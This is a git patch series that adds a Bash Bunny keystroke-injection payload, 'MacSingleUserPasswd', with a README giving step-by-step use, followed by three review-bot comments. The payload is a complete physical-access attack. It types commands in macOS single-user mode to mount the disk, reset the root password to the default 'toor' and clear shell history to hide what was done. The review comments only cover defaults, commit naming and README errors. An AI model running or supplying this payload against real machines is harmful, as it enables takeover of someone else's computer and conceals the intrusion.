From 745517d25ddd53c325e6ace8ccde18c3e025d0ba Mon Sep 17 00:00:00 2001 From: Aidan Holland Date: Thu, 1 Feb 2018 20:45:29 -0500 Subject: [PATCH 1/3] Create payload.txt --- .../MacSingleUserPasswd/payload.txt | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 payloads/library/credentials/MacSingleUserPasswd/payload.txt diff --git a/payloads/library/credentials/MacSingleUserPasswd/payload.txt b/payloads/library/credentials/MacSingleUserPasswd/payload.txt new file mode 100644 index 00000000..1b48468d --- /dev/null +++ b/payloads/library/credentials/MacSingleUserPasswd/payload.txt @@ -0,0 +1,37 @@ +#!/bin/bash +# +# Title: MacSingleUserPasswd +# Description: Automatically resets user password on macOS through single user mode +# Author: thehappydinoa +# Version: 1.0.2 +# Category: Credentials +# Target: macOS +# Attackmodes: HID +# + +## OPTIONS + +ACCOUNT="root" +PASSWD="toor" + +## ATTACK +LED STAGE1 +ATTACKMODE HID +Q STRING /sbin/fsck -y\; /sbin/mount -uw /\; echo "Change switch position now"\; +Q ENTER + +LED STAGE2 +WAIT + + +LED STAGE3 +Q STRING launchctl load /System/Library/LaunchDaemons/com.apple.opendirectoryd.plist\; launchctl load /System/Library/LaunchDaemons/com.apple.DirectoryServices.plist\; passwd $ACCOUNT\; +Q ENTER +Q STRING $PASSWD +Q ENTER +Q STRING $PASSWD +Q ENTER +LED CLEANUP +Q STRING history -c\; exit\; +Q ENTER +LED FINISH From d7472465dd9eca6800244f32aa5f768571dbdac5 Mon Sep 17 00:00:00 2001 From: Aidan Holland Date: Thu, 1 Feb 2018 20:48:25 -0500 Subject: [PATCH 2/3] Update payload.txt --- payloads/library/credentials/MacSingleUserPasswd/payload.txt | 1 - 1 file changed, 1 deletion(-) diff --git a/payloads/library/credentials/MacSingleUserPasswd/payload.txt b/payloads/library/credentials/MacSingleUserPasswd/payload.txt index 1b48468d..dfc93267 100644 --- a/payloads/library/credentials/MacSingleUserPasswd/payload.txt +++ b/payloads/library/credentials/MacSingleUserPasswd/payload.txt 
@@ -10,7 +10,6 @@ # ## OPTIONS - ACCOUNT="root" PASSWD="toor" From 509fd26e528dd7e3d2927ad4f54f7521147c07d6 Mon Sep 17 00:00:00 2001 From: Aidan Holland Date: Thu, 1 Feb 2018 21:05:12 -0500 Subject: [PATCH 3/3] Create README.md --- .../credentials/MacSingleUserPasswd/README.md | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 payloads/library/credentials/MacSingleUserPasswd/README.md diff --git a/payloads/library/credentials/MacSingleUserPasswd/README.md b/payloads/library/credentials/MacSingleUserPasswd/README.md new file mode 100644 index 00000000..b7ac03c0 --- /dev/null +++ b/payloads/library/credentials/MacSingleUserPasswd/README.md @@ -0,0 +1,32 @@ +# MacSingleUserPasswd + +* Author: [thehappydinoa](https://github.com/thehappydinoa) +* Version: Version 1.0.2 +* Target: macOS + +## Description + +Quickly and efficiently updates the password of a user though the single user mode on macOS. + +## Configuration + +Update `ACCOUNT` and `PASSWD` accordingly. + +## Use + +1. Restart the Mac. +2. Hold `command` and `s` until you see white text on the screen. +3. Once you come to the `:/ root#` prompt plug in the Bash Bunny. +It should look similar to this: +![Single User Mode](http://cdn2.tekrevue.com/wp-content/uploads/2014/09/single-user-mode.jpg) +4. When it finishs mounting the root directory `/` it will tell you to `Change switch position now`. At this point you should change the switch position. +5. When you see the FINISHED LED you can unplug and wait for the machine to restart. + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| STAGE1 | Mounts root directory | +| STAGE2 | Runs WAIT extension | +| STAGE3 | Loads LaunchDaemons for user management | +| FINISH | Clears history and restarts |
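Review bot: In patch 1/3, the OPTIONS block of payload.txt ships `ACCOUNT="root"` together with `PASSWD="toor"` as defaults, so a run with unedited options leaves the root account set to a widely known password. Ship `PASSWD` empty and have the script stop before STAGE1 when it is unset. The `# Description:` header line should also say that the existing password for `ACCOUNT` is overwritten and not restored.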
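Review bot: The subject of patch 2/3, "Update payload.txt", does not describe the change, which is a single blank-line removal after `## OPTIONS`. Squash it into patch 1/3, or give it a subject that names the whitespace change.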
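Review bot: In patch 3/3, the STATUS table in README.md does not match the LED calls in payload.txt. The payload sets `LED CLEANUP` before `history -c\; exit\;` and `LED FINISH` only afterwards, but the table has no CLEANUP row, lists FINISH as "Clears history and restarts", and step 5 refers to a "FINISHED LED". Add a CLEANUP row, describe FINISH as the completed state, and use the name FINISH in step 5. In the same file, "though the single user mode" should read "through", "finishs" should read "finishes", and `Version: Version 1.0.2` repeats the word. The README also lists no tested macOS versions or prerequisites for step 2, and the screenshot is hotlinked over plain `http://` from a third-party host, so consider committing the image to the repository instead.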